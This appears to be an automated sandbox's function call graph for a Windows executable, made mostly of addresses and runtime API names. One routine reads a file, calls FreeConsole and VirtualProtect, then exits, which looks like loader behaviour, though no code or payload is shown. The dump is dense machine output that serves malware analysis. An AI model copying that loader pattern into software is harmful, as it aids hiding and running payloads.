15945->15944 15948 da5045 15945->15948 15946->15947 15947->15930 15947->15939 15950 da5098 15948->15950 15951 da50a4 ___scrt_is_nonwritable_in_current_image 15950->15951 15958 da4ef9 EnterCriticalSection 15951->15958 15953 da50b2 15955 da50e3 15953->15955 15959 da4f55 15953->15959 15972 da511d 15955->15972 15958->15953 15960 da4cb0 _Fputc 29 API calls 15959->15960 15963 da4f65 15960->15963 15961 da4f6b 15975 da4d1a 15961->15975 15963->15961 15964 da4f9d 15963->15964 15965 da4cb0 _Fputc 29 API calls 15963->15965 15964->15961 15966 da4cb0 _Fputc 29 API calls 15964->15966 15967 da4f94 15965->15967 15968 da4fa9 CloseHandle 15966->15968 15969 da4cb0 _Fputc 29 API calls 15967->15969 15968->15961 15970 da4fb5 GetLastError 15968->15970 15969->15964 15970->15961 15971 da4fc3 __fread_nolock 15971->15955 15984 da4f1c LeaveCriticalSection 15972->15984 15974 da5106 15974->15947 15976 da4d29 15975->15976 15977 da4d90 15975->15977 15976->15977 15983 da4d53 15976->15983 15978 d9ad6d __strnicoll 14 API calls 15977->15978 15979 da4d95 15978->15979 15980 d9ad80 __dosmaperr 14 API calls 15979->15980 15981 da4d80 15980->15981 15981->15971 15982 da4d7a SetStdHandle 15982->15981 15983->15981 15983->15982 15984->15974 15985->15942 15986->15913 17506 d9416b 17507 d9417f 17506->17507 17508 d943df 69 API calls 17507->17508 17513 d941da 17507->17513 17509 d941aa 17508->17509 17510 d941c7 17509->17510 17511 d9ae1d 67 API calls 17509->17511 17509->17513 17510->17513 17514 d9c01e 17510->17514 17511->17510 17515 d9c029 17514->17515 17516 d9c03e 17514->17516 17517 d9ad6d __strnicoll 14 API calls 17515->17517 17518 d9c05b 17516->17518 17519 d9c046 17516->17519 17520 d9c02e 17517->17520 17528 da4217 17518->17528 17521 d9ad6d __strnicoll 14 API calls 17519->17521 17523 d9b458 __strnicoll 29 API calls 17520->17523 17524 d9c04b 17521->17524 17526 d9c039 17523->17526 17527 d9b458 __strnicoll 29 API calls 17524->17527 17525 d9c056 17525->17513 17526->17513 17527->17525 17529 da422b _Fputc 17528->17529 17532 da47c0 17529->17532 17531 da4237 _Fputc 17531->17525 17533 da47cc ___scrt_is_nonwritable_in_current_image 17532->17533 17534 da47d3 17533->17534 17535 da47f6 17533->17535 17536 d9b601 _Fputc 29 API calls 17534->17536 17543 d9875f EnterCriticalSection 17535->17543 17538 da47ec 17536->17538 17538->17531 17539 da4804 17544 da461f 17539->17544 17541 da4813 17557 da4845 17541->17557 17543->17539 17545 da462e 17544->17545 17546 da4656 17544->17546 17547 d9b601 _Fputc 29 API calls 17545->17547 17548 da0efc _Fputc 29 API calls 17546->17548 17556 da4649 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 17547->17556 17549 da465f 17548->17549 17550 da4051 33 API calls 17549->17550 17551 da467d 17550->17551 17552 da4709 17551->17552 17554 da4720 17551->17554 17551->17556 17553 da42a9 34 API calls 17552->17553 17553->17556 17555 da4454 33 API calls 17554->17555 17554->17556 17555->17556 17556->17541 17560 d98773 LeaveCriticalSection 17557->17560 17559 da484d 17559->17538 17560->17559 14838 d91614 GetPEB 14860 d91098 14838->14860 14841 d91828 14843 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 14841->14843 14842 d91680 GetFileSize 14844 d91804 CloseHandle 14842->14844 14845 d91694 14842->14845 14846 d91836 14843->14846 14844->14841 14847 d9169c ReadFile 14845->14847 14848 d916b9 CloseHandle 14847->14848 14849 d917fb 14847->14849 14851 d916d0 _Yarn error_info_injector _strlen 14848->14851 14859 d917f9 14848->14859 14849->14844 14852 d91840 14851->14852 14854 d91845 14851->14854 14851->14859 14885 d9186a 14851->14885 14891 d92952 14851->14891 14903 d91860 14852->14903 14905 d9b468 14854->14905 14871 d9155c 14859->14871 14869 d910c1 _Yarn error_info_injector _strlen 14860->14869 14870 d9120e 14860->14870 14861 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 14862 d91227 CreateFileA 14861->14862 14862->14841 14862->14842 14863 d91231 14864 d91860 std::ios_base::_Init 31 API calls 14863->14864 14865 d91236 14864->14865 14866 d9b468 std::ios_base::_Init 29 API calls 14865->14866 14866->14865 14867 d9186a std::ios_base::_Init 31 API calls 14867->14869 14868 d92952 std::ios_base::_Init 16 API calls 14868->14869 14869->14863 14869->14865 14869->14867 14869->14868 14869->14870 14870->14861 14872 d91098 31 API calls 14871->14872 14873 d91582 FreeConsole 14872->14873 14910 d9123b 14873->14910 14876 d9123b 104 API calls 14877 d915b9 14876->14877 14878 d91098 31 API calls 14877->14878 14879 d915cc VirtualProtect 14878->14879 14880 d915dd 14879->14880 14881 d915f1 ExitProcess 14879->14881 14882 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 14880->14882 14883 d915e7 14882->14883 14883->14841 14886 d9188b 14885->14886 14887 d91873 14885->14887 15526 d91890 14886->15526 14888 d92952 std::ios_base::_Init 16 API calls 14887->14888 14890 d9187c 14888->14890 14890->14851 14894 d92957 14891->14894 14892 d9c994 _Yarn 15 API calls 14892->14894 14893 d92971 14893->14851 14894->14892 14894->14893 14895 d98f08 std::ios_base::_Init 2 API calls 14894->14895 14896 d92973 14894->14896 14895->14894 14897 d94a6f std::ios_base::_Init 14896->14897 14898 d9297d Concurrency::cancel_current_task 14896->14898 14899 d95aba Concurrency::cancel_current_task RaiseException 14897->14899 14900 d95aba Concurrency::cancel_current_task RaiseException 14898->14900 14901 d94a8b 14899->14901 14902 d931cf 14900->14902 15531 d931d0 14903->15531 14906 d9b6a7 __strnicoll 29 API calls 14905->14906 14907 d9b477 14906->14907 14908 d9b485 __Getctype 11 API calls 14907->14908 14909 d9b484 14908->14909 14917 d91263 14910->14917 14911 d91355 14913 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 14911->14913 14912 d912c2 KiUserExceptionDispatcher 14912->14917 14914 d91363 14913->14914 14914->14876 14917->14911 14917->14912 14918 d9136e 14917->14918 14934 d91533 14917->14934 14919 d9138d _strlen 14918->14919 14941 d9197e 14919->14941 14921 d914c0 14955 d91ab6 14921->14955 14922 d913ad 14922->14921 14930 d91444 14922->14930 14949 d919d8 14922->14949 14924 d91515 14970 d91a10 14924->14970 14928 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 14931 d91529 14928->14931 14929 d919d8 69 API calls 14932 d91466 14929->14932 14945 d9408b 14930->14945 14931->14917 14932->14921 14932->14929 15265 d923c4 14934->15265 14939 d91a3a 40 API calls 14940 d91558 14939->14940 14940->14917 14942 d91995 14941->14942 14944 d919a6 14942->14944 14974 d91a3a 14942->14974 14944->14922 14946 d9409a 14945->14946 14948 d940ad _Yarn 14945->14948 14946->14932 14948->14946 14984 d9c578 14948->14984 14950 d919e5 14949->14950 14951 d919ee 14950->14951 15057 d93c29 14950->15057 15066 d93c0b 14950->15066 15078 d93c1b 14950->15078 14951->14922 14956 d91ae9 14955->14956 14957 d91ad6 14955->14957 14958 d91af9 14956->14958 15126 d95aba 14956->15126 14959 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 14957->14959 15129 d91c57 14958->15129 14960 d91ae1 14959->14960 14960->14924 14966 d95aba Concurrency::cancel_current_task RaiseException 14967 d91b3a 14966->14967 15140 d91e48 14967->15140 14971 d91a18 14970->14971 14972 d9151e 14971->14972 15261 d922fe 14971->15261 14972->14928 14975 d91a5a 14974->14975 14976 d91aa2 14974->14976 14977 d9197e 40 API calls 14975->14977 14978 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 14976->14978 14979 d91a64 14977->14979 14980 d91aad 14978->14980 14981 d91a9b 14979->14981 14983 d91ab6 std::ios_base::_Init 40 API calls 14979->14983 14980->14944 14982 d91a10 40 API calls 14981->14982 14982->14976 14983->14981 14985 d9c58b _Fputc 14984->14985 14988 d9c759 14985->14988 14987 d9c5a0 _Fputc 14987->14946 14989 d9c767 14988->14989 14995 d9c78f 14988->14995 14990 d9c774 14989->14990 14991 d9c796 14989->14991 14989->14995 14993 d9b601 _Fputc 29 API calls 14990->14993 14996 d9c81c 14991->14996 14993->14995 14995->14987 14997 d9c828 ___scrt_is_nonwritable_in_current_image 14996->14997 15004 d9875f EnterCriticalSection 14997->15004 14999 d9c836 15005 d9c7d0 14999->15005 15004->14999 15015 da0bb7 15005->15015 15012 d9c86b 15056 d98773 LeaveCriticalSection 15012->15056 15014 d9c7ce 15014->14987 15036 da0c62 15015->15036 15017 d9c7e8 15022 d9c5b2 15017->15022 15018 da0bc8 _Fputc 15018->15017 15019 d9e531 __fread_nolock 15 API calls 15018->15019 15020 da0c21 15019->15020 15021 d9e4f7 ___free_lconv_mon 14 API calls 15020->15021 15021->15017 15025 d9c5c4 15022->15025 15027 d9c5ed 15022->15027 15023 d9c5d2 15024 d9b601 _Fputc 29 API calls 15023->15024 15024->15027 15025->15023 15025->15027 15031 d9c608 _Yarn 15025->15031 15032 da0ca0 15027->15032 15028 d9bc27 ___scrt_uninitialize_crt 64 API calls 15028->15031 15029 da0efc _Fputc 29 API calls 15029->15031 15030 da549f _Fputc 64 API calls 15030->15031 15031->15027 15031->15028 15031->15029 15031->15030 15043 da5eec 15031->15043 15033 da0cab 15032->15033 15035 d9c812 15032->15035 15034 d9bc27 ___scrt_uninitialize_crt 64 API calls 15033->15034 15033->15035 15034->15035 15035->15012 15037 da0c6e _Fputc 15036->15037 15038 da0c98 15037->15038 15039 da0efc _Fputc 29 API calls 15037->15039 15038->15018 15040 da0c89 15039->15040 15041 da8994 __fread_nolock 29 API calls 15040->15041 15042 da0c8f 15041->15042 15042->15018 15044 da5f7c 15043->15044 15045 da0efc _Fputc 29 API calls 15044->15045 15047 da5f89 15045->15047 15046 da5f95 15046->15031 15047->15046 15048 da5fe1 15047->15048 15049 da5ef7 _Fputc 31 API calls 15047->15049 15048->15046 15051 da0c62 _Fputc 29 API calls 15048->15051 15055 da6043 15048->15055 15049->15048 15050 da6072 _Fputc 64 API calls 15052 da6054 15050->15052 15053 da6036 15051->15053 15052->15031 15054 da7d00 __fread_nolock 14 API calls 15053->15054 15053->15055 15054->15055 15055->15050 15056->15014 15060 d93c4c 15057->15060 15062 d93c45 15057->15062 15058 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 15059 d93d31 15058->15059 15059->14951 15060->15062 15063 d93cf2 15060->15063 15064 d93c92 15060->15064 15062->15058 15063->15062 15065 d9c578 69 API calls 15063->15065 15064->15062 15091 d935da 15064->15091 15065->15062 15067 d93c12 15066->15067 15070 d93c5e 15066->15070 15124 d9875f EnterCriticalSection 15067->15124 15069 d93c17 15069->14951 15074 d93cf2 15070->15074 15075 d93c92 15070->15075 15076 d93c62 15070->15076 15071 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 15072 d93d31 15071->15072 15072->14951 15073 d935da _Fputc 68 API calls 15073->15076 15074->15076 15077 d9c578 69 API calls 15074->15077 15075->15073 15075->15076 15076->15071 15077->15076 15079 d93c22 15078->15079 15083 d93c6e 15078->15083 15125 d98773 LeaveCriticalSection 15079->15125 15081 d93bf9 15081->14951 15082 d93c27 15082->14951 15083->15081 15084 d93cf2 15083->15084 15085 d93cd3 15083->15085 15086 d9c578 69 API calls 15084->15086 15089 d93ce4 15084->15089 15087 d935da _Fputc 68 API calls 15085->15087 15085->15089 15086->15089 15087->15089 15088 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 15090 d93d31 15088->15090 15089->15088 15090->14951 15094 d9c079 15091->15094 15093 d935ea 15093->15062 15095 d9c08c _Fputc 15094->15095 15098 d9c0da 15095->15098 15097 d9c09b _Fputc 15097->15093 15099 d9c0e6 ___scrt_is_nonwritable_in_current_image 15098->15099 15100 d9c0ef 15099->15100 15101 d9c113 15099->15101 15102 d9b601 _Fputc 29 API calls 15100->15102 15114 d9875f EnterCriticalSection 15101->15114 15113 d9c108 _Fputc 15102->15113 15104 d9c11c 15105 da0efc _Fputc 29 API calls 15104->15105 15108 d9c131 15104->15108 15105->15108 15106 d9c19d 15109 d9b601 _Fputc 29 API calls 15106->15109 15107 d9c1ce 15115 d9c0ad 15107->15115 15108->15106 15108->15107 15109->15113 15111 d9c1da 15120 d9c206 15111->15120 15113->15097 15114->15104 15116 d9c0bb 15115->15116 15117 d9c0cc 15115->15117 15118 da5eec _Fputc 66 API calls 15116->15118 15117->15111 15119 d9c0c7 15118->15119 15119->15111 15123 d98773 LeaveCriticalSection 15120->15123 15122 d9c20c 15122->15113 15123->15122 15124->15069 15125->15082 15127 d95b02 RaiseException 15126->15127 15128 d95ad4 15126->15128 15127->14958 15128->15127 15130 d91c7a 15129->15130 15131 d91b17 15129->15131 15157 d929d4 AcquireSRWLockExclusive 15130->15157 15137 d91b3a 15131->15137 15133 d91c84 15133->15131 15162 d92a89 15133->15162 15138 d91e48 std::ios_base::_Init 40 API calls 15137->15138 15139 d91b2f 15138->15139 15139->14966 15141 d91e75 _strlen 15140->15141 15142 d91f5e 15141->15142 15143 d91e80 15141->15143 15145 d91860 std::ios_base::_Init 31 API calls 15142->15145 15144 d91e8f _Yarn 15143->15144 15146 d91ec8 15143->15146 15147 d91ed0 15143->15147 15201 d91f68 15144->15201 15148 d91f63 15145->15148 15149 d9186a std::ios_base::_Init 31 API calls 15146->15149 15150 d92952 std::ios_base::_Init 16 API calls 15147->15150 15151 d9b468 std::ios_base::_Init 29 API calls 15148->15151 15149->15144 15150->15144 15151->15148 15154 d91f30 error_info_injector 15155 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 15154->15155 15156 d91b4f 15155->15156 15156->14924 15158 d929e8 15157->15158 15159 d929ed ReleaseSRWLockExclusive 15158->15159 15166 d92a74 SleepConditionVariableSRW 15158->15166 15159->15133 15167 d92a9e 15162->15167 15165 d92a23 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 15165->15131 15166->15158 15168 d92aad 15167->15168 15169 d92ab4 15167->15169 15173 d9aac5 15168->15173 15176 d9aa54 15169->15176 15172 d91c9a 15172->15165 15174 d9aa54 std::ios_base::_Init 32 API calls 15173->15174 15175 d9aad7 15174->15175 15175->15172 15179 d9acb7 15176->15179 15180 d9acc3 ___scrt_is_nonwritable_in_current_image 15179->15180 15187 d9b750 EnterCriticalSection 15180->15187 15182 d9acd1 15188 d9aadb 15182->15188 15184 d9acde 15198 d9ad06 15184->15198 15187->15182 15189 d9aaf6 15188->15189 15190 d9ab69 std::_Lockit::_Lockit 15188->15190 15189->15190 15191 d9ab49 15189->15191 15192 da3f46 std::ios_base::_Init 32 API calls 15189->15192 15190->15184 15191->15190 15193 da3f46 std::ios_base::_Init 32 API calls 15191->15193 15195 d9ab3f 15192->15195 15194 d9ab5f 15193->15194 15196 d9e4f7 ___free_lconv_mon 14 API calls 15194->15196 15197 d9e4f7 ___free_lconv_mon 14 API calls 15195->15197 15196->15190 15197->15191 15199 d9b767 std::_Lockit::~_Lockit LeaveCriticalSection 15198->15199 15200 d9aa85 15199->15200 15200->15172 15202 d91fa0 15201->15202 15203 d91faa 15202->15203 15204 d920be 15202->15204 15205 d91fb2 _Yarn 15203->15205 15208 d91fe8 15203->15208 15209 d91ff0 15203->15209 15206 d91860 std::ios_base::_Init 31 API calls 15204->15206 15220 d920c8 15205->15220 15207 d920c3 15206->15207 15210 d9b468 std::ios_base::_Init 29 API calls 15207->15210 15211 d9186a std::ios_base::_Init 31 API calls 15208->15211 15212 d92952 std::ios_base::_Init 16 API calls 15209->15212 15210->15207 15211->15205 15212->15205 15217 d92085 error_info_injector 15218 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 15217->15218 15219 d91f0d 15218->15219 15219->15148 15219->15154 15221 d920f8 15220->15221 15222 d920ea 15220->15222 15224 d9218a std::ios_base::_Init 40 API calls 15221->15224 15239 d9218a 15222->15239 15225 d9211b 15224->15225 15227 d92185 15225->15227 15229 d9213f error_info_injector 15225->15229 15226 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 15228 d92029 15226->15228 15230 d9b468 std::ios_base::_Init 29 API calls 15227->15230 15231 d96097 15228->15231 15229->15226 15230->15227 15232 d960a4 15231->15232 15238 d92059 15231->15238 15232->15238 15254 d9c994 15232->15254 15235 d960d1 15236 d9c522 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14 API calls 15235->15236 15236->15238 15237 d9e16c ___std_exception_copy 29 API calls 15237->15235 15238->15207 15238->15217 15240 d921a9 15239->15240 15241 d9224f _Yarn error_info_injector 15239->15241 15242 d922f3 15240->15242 15247 d921b8 15240->15247 15241->15221 15243 d91860 std::ios_base::_Init 31 API calls 15242->15243 15252 d921e9 _Yarn 15243->15252 15244 d921e3 15245 d9186a std::ios_base::_Init 31 API calls 15244->15245 15245->15252 15246 d9b468 std::ios_base::_Init 29 API calls 15251 d922fd 15246->15251 15247->15244 15248 d922e8 15247->15248 15247->15252 15249 d92952 std::ios_base::_Init 16 API calls 15248->15249 15249->15252 15250 d92339 15250->15221 15251->15250 15253 d91ab6 std::ios_base::_Init 40 API calls 15251->15253 15252->15241 15252->15246 15253->15250 15260 d9e531 __dosmaperr 15254->15260 15255 d9e56f 15256 d9ad6d __strnicoll 14 API calls 15255->15256 15258 d960c1 15256->15258 15257 d9e55a RtlAllocateHeap 15257->15258 15257->15260 15258->15235 15258->15237 15259 d98f08 std::ios_base::_Init 2 API calls 15259->15260 15260->15255 15260->15257 15260->15259 15262 d92339 15261->15262 15263 d9230b 15261->15263 15262->14972 15263->15262 15264 d91ab6 std::ios_base::_Init 40 API calls 15263->15264 15264->15262 15266 d923ea 15265->15266 15282 d9242b 15266->15282 15269 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 15270 d91546 15269->15270 15271 d9233c 15270->15271 15272 d9197e 40 API calls 15271->15272 15273 d92358 15272->15273 15274 d919d8 69 API calls 15273->15274 15275 d92372 15273->15275 15274->15275 15276 d91ab6 std::ios_base::_Init 40 API calls 15275->15276 15277 d923a7 15276->15277 15278 d91a10 40 API calls 15277->15278 15279 d923ae 15278->15279 15280 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 15279->15280 15281 d91551 15280->15281 15281->14939 15299 d92cd9 15282->15299 15286 d9245e 15287 d9248c 15286->15287 15313 d9254a 15286->15313 15331 d92d0a 15287->15331 15289 d924a8 15291 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 15289->15291 15295 d923f0 15291->15295 15293 d924bc 15338 d925d6 15293->15338 15294 d92483 15325 d92d7d 15294->15325 15295->15269 15300 d92ce8 15299->15300 15301 d92cef 15299->15301 15349 d9b77e 15300->15349 15304 d9244b 15301->15304 15354 d951f8 EnterCriticalSection 15301->15354 15305 d924c2 15304->15305 15306 d924d8 15305->15306 15307 d924fc 15305->15307 15308 d92cd9 std::_Lockit::_Lockit 7 API calls 15306->15308 15309 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 15307->15309 15310 d924e3 15308->15310 15311 d92509 15309->15311 15312 d92d0a std::_Lockit::~_Lockit 2 API calls 15310->15312 15311->15286 15312->15307 15314 d925bf 15313->15314 15315 d92563 15313->15315 15316 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 15314->15316 15315->15314 15318 d92952 std::ios_base::_Init 16 API calls 15315->15318 15317 d9247b 15316->15317 15317->15293 15317->15294 15319 d92573 15318->15319 15403 d925fa 15319->15403 15326 d9c994 _Yarn 15 API calls 15325->15326 15327 d92d88 15326->15327 15328 d92d8f 15327->15328 15520 d931b3 15327->15520 15328->15287 15332 d9b78c 15331->15332 15333 d92d14 15331->15333 15525 d9b767 LeaveCriticalSection 15332->15525 15335 d92d27 15333->15335 15524 d95206 LeaveCriticalSection 15333->15524 15335->15289 15336 d9b793 15336->15289 15339 d95aba Concurrency::cancel_current_task RaiseException 15338->15339 15340 d925fa 15339->15340 15341 d92cd9 std::_Lockit::_Lockit 7 API calls 15340->15341 15342 d9260b 15341->15342 15343 d92635 15342->15343 15344 d92647 15342->15344 15346 d92dff codecvt 65 API calls 15343->15346 15345 d931f0 codecvt 31 API calls 15344->15345 15347 d92651 15345->15347 15348 d924c1 15346->15348 15355 d9f432 15349->15355 15354->15304 15356 d9f5b9 std::_Lockit::_Lockit 5 API calls 15355->15356 15357 d9f437 15356->15357 15376 d9f5d3 15357->15376 15375 d9f464 15375->15375 15377 d9f534 std::_Lockit::_Lockit 5 API calls 15376->15377 15378 d9f43c 15377->15378 15379 d9f5ed 15378->15379 15380 d9f534 std::_Lockit::_Lockit 5 API calls 15379->15380 15381 d9f441 15380->15381 15382 d9f607 15381->15382 15383 d9f534 std::_Lockit::_Lockit 5 API calls 15382->15383 15384 d9f446 15383->15384 15385 d9f621 15384->15385 15386 d9f534 std::_Lockit::_Lockit 5 API calls 15385->15386 15387 d9f44b 15386->15387 15388 d9f63b 15387->15388 15389 d9f534 std::_Lockit::_Lockit 5 API calls 15388->15389 15390 d9f450 15389->15390 15391 d9f655 15390->15391 15392 d9f534 std::_Lockit::_Lockit 5 API calls 15391->15392 15393 d9f455 15392->15393 15394 d9f66f 15393->15394 15395 d9f534 std::_Lockit::_Lockit 5 API calls 15394->15395 15396 d9f45a 15395->15396 15397 d9f689 15396->15397 15398 d9f534 std::_Lockit::_Lockit 5 API calls 15397->15398 15399 d9f45f 15398->15399 15400 d9f6a3 15399->15400 15401 d9f534 std::_Lockit::_Lockit 5 API calls 15400->15401 15402 d9f6b9 15401->15402 15402->15375 15404 d92cd9 std::_Lockit::_Lockit 7 API calls 15403->15404 15405 d9260b 15404->15405 15406 d92635 15405->15406 15407 d92647 15405->15407 15439 d92dff 15406->15439 15448 d931f0 15407->15448 15412 d94915 15483 d98588 15412->15483 15455 d9c99f 15439->15455 15443 d92e24 15444 d92e33 15443->15444 15445 d9c99f std::_Locinfo::_Locinfo_dtor 64 API calls 15443->15445 15446 d92e65 _Yarn 15 API calls 15444->15446 15445->15444 15447 d9259b 15446->15447 15447->15412 15474 d93292 15448->15474 15451 d95aba Concurrency::cancel_current_task RaiseException 15452 d9320f 15451->15452 15477 d91918 15452->15477 15456 d9f432 std::_Lockit::_Lockit 5 API calls 15455->15456 15457 d9c9ac 15456->15457 15466 d9cbd1 15457->15466 15460 d92e65 15461 d92e73 15460->15461 15465 d92e9e _Yarn 15460->15465 15462 d92e7f 15461->15462 15463 d9c522 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 14 API calls 15461->15463 15464 d9c994 _Yarn 15 API calls 15462->15464 15462->15465 15463->15462 15464->15465 15465->15443 15467 d9cbdd ___scrt_is_nonwritable_in_current_image 15466->15467 15468 d9b750 std::_Lockit::_Lockit EnterCriticalSection 15467->15468 15469 d9cbeb 15468->15469 15470 d9ca72 std::_Locinfo::_Locinfo_dtor 64 API calls 15469->15470 15471 d9cbf8 15470->15471 15472 d9cc20 std::_Locinfo::_Locinfo_dtor LeaveCriticalSection 15471->15472 15473 d92e0c 15472->15473 15473->15460 15480 d93155 15474->15480 15478 d96097 ___std_exception_copy 30 API calls 15477->15478 15479 d9193a 15478->15479 15481 d96097 ___std_exception_copy 30 API calls 15480->15481 15482 d93181 15481->15482 15482->15451 15484 d9e783 _unexpected 39 API calls 15483->15484 15485 d98593 15484->15485 15486 d9ed66 __Getctype 39 API calls 15485->15486 15521 d931c1 Concurrency::cancel_current_task 15520->15521 15522 d95aba Concurrency::cancel_current_task RaiseException 15521->15522 15523 d931cf 15522->15523 15524->15335 15525->15336 15527 d95aba Concurrency::cancel_current_task RaiseException 15526->15527 15528 d918b4 15527->15528 15529 d96097 ___std_exception_copy 30 API calls 15528->15529 15530 d918d6 15529->15530 15530->14886 15536 d93258 15531->15536 15534 d95aba Concurrency::cancel_current_task RaiseException 15535 d931ef 15534->15535 15537 d93155 std::exception::exception 30 API calls 15536->15537 15538 d931e1 15537->15538 15538->15534 17914 d9430a 17915 d94342 17914->17915 17916 d94313 17914->17916 17916->17915 17919 d9bb66 17916->17919 17918 d94335 17920 d9bb78 17919->17920 17922 d9bb81 ___scrt_uninitialize_crt 17919->17922 17921 d9bce4 ___scrt_uninitialize_crt 68 API calls 17920->17921 17923 d9bb7e 17921->17923 17924 d9bb90 17922->17924 17927 d9be69 17922->17927 17923->17918 17924->17918 17928 d9be75 ___scrt_is_nonwritable_in_current_image 17927->17928 17935 d9875f EnterCriticalSection 17928->17935 17930 d9be83 17931 d9bbc2 ___scrt_uninitialize_crt 68 API calls 17930->17931 17932 d9be94 17931->17932 17936 d9bebd 17932->17936 17935->17930 17939 d98773 LeaveCriticalSection 17936->17939 17938 d9bbb7 17938->17918 17939->17938 16388 d93e04 16389 d93e10 __EH_prolog3_GS 16388->16389 16392 d93e79 16389->16392 16393 d93e60 16389->16393 16397 d93e2a 16389->16397 16405 d9bec9 16392->16405 16402 d935ba 16393->16402 16429 d9535e 16397->16429 16398 d93e98 16398->16397 16400 d9bec9 45 API calls 16398->16400 16401 d93f6d 16398->16401 16425 d933ee 16398->16425 16400->16398 16401->16397 16432 d9cf47 16401->16432 16403 d9bec9 45 API calls 16402->16403 16404 d935c5 16403->16404 16404->16397 16406 d9bed5 ___scrt_is_nonwritable_in_current_image 16405->16406 16407 d9bedf 16406->16407 16408 d9bef7 16406->16408 16409 d9ad6d __strnicoll 14 API calls 16407->16409 16445 d9875f EnterCriticalSection 16408->16445 16411 d9bee4 16409->16411 16413 d9b458 __strnicoll 29 API calls 16411->16413 16412 d9bf02 16414 da0efc _Fputc 29 API calls 16412->16414 16417 d9bf1a 16412->16417 16424 d9beef _Fputc 16413->16424 16414->16417 16415 d9bfaa 16446 d9bfe2 16415->16446 16416 d9bf82 16419 d9ad6d __strnicoll 14 API calls 16416->16419 16417->16415 16417->16416 16421 d9bf87 16419->16421 16420 d9bfb0 16456 d9bfda 16420->16456 16423 d9b458 __strnicoll 29 API calls 16421->16423 16423->16424 16424->16398 16426 d93422 16425->16426 16428 d933fe 16425->16428 16628 d946df 16426->16628 16428->16398 16430 d929c6 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z 5 API calls 16429->16430 16431 d95368 16430->16431 16431->16431 16433 d9cf53 ___scrt_is_nonwritable_in_current_image 16432->16433 16434 d9cf5a 16433->16434 16435 d9cf6f 16433->16435 16436 d9ad6d __strnicoll 14 API calls 16434->16436 16643 d9875f EnterCriticalSection 16435->16643 16438 d9cf5f 16436->16438 16441 d9b458 __strnicoll 29 API calls 16438->16441 16439 d9cf79 16644 d9cfba 16439->16644 16443 d9cf6a 16441->16443 16443->16401 16445->16412 16447 d9bfee 16446->16447 16448 d9c003 16446->16448 16449 d9ad6d __strnicoll 14 API calls 16447->16449 16450 d9c012 16448->16450 16459 da5d52 16448->16459 16451 d9bff3 16449->16451 16450->16420 16453 d9b458 __strnicoll 29 API calls 16451->16453 16455 d9bffe 16453->16455 16455->16420 16627 d98773 LeaveCriticalSection 16456->16627 16458 d9bfe0 16458->16424 16460 da5d5d 16459->16460 16461 da5d6a 16460->16461 16464 da5d82 16460->16464 16462 d9ad6d __strnicoll 14 API calls 16461->16462 16463 da5d6f 16462->16463 16465 d9b458 __strnicoll 29 API calls 16463->16465 16466 da5de1 16464->16466 16474 d9c00f 16464->16474 16480 da7d00 16464->16480 16465->16474 16468 da0efc _Fputc 29 API calls 16466->16468 16469 da5dfa 16468->16469 16485 da6144 16469->16485 16472 da0efc _Fputc 29 API calls 16473 da5e33 16472->16473 16473->16474 16475 da0efc _Fputc 29 API calls 16473->16475 16474->16420 16476 da5e41 16475->16476 16476->16474 16477 da0efc _Fputc 29 API calls 16476->16477 16478 da5e4f 16477->16478 16479 da0efc _Fputc 29 API calls 16478->16479 16479->16474 16481 d9f807 __dosmaperr 14 API calls 16480->16481 16482 da7d1d 16481->16482 16483 d9e4f7 ___free_lconv_mon 14 API calls 16482->16483 16484 da7d27 16483->16484 16484->16466 16486 da6150 ___scrt_is_nonwritable_in_current_image 16485->16486 16487 da6158 16486->16487 16492 da6173 16486->16492 16488 d9ad80 __dosmaperr 14 API calls 16487->16488 16489 da615d 16488->16489 16490 d9ad6d __strnicoll 14 API calls 16489->16490 16514 da5e02 16490->16514 16491 da618a 16494 d9ad80 __dosmaperr 14 API calls 16491->16494 16492->16491 16493 da61c5 16492->16493 16496 da61ce 16493->16496 16497 da61e3 16493->16497 16495 da618f 16494->16495 16498 d9ad6d __strnicoll 14 API calls 16495->16498 16499 d9ad80 __dosmaperr 14 API calls 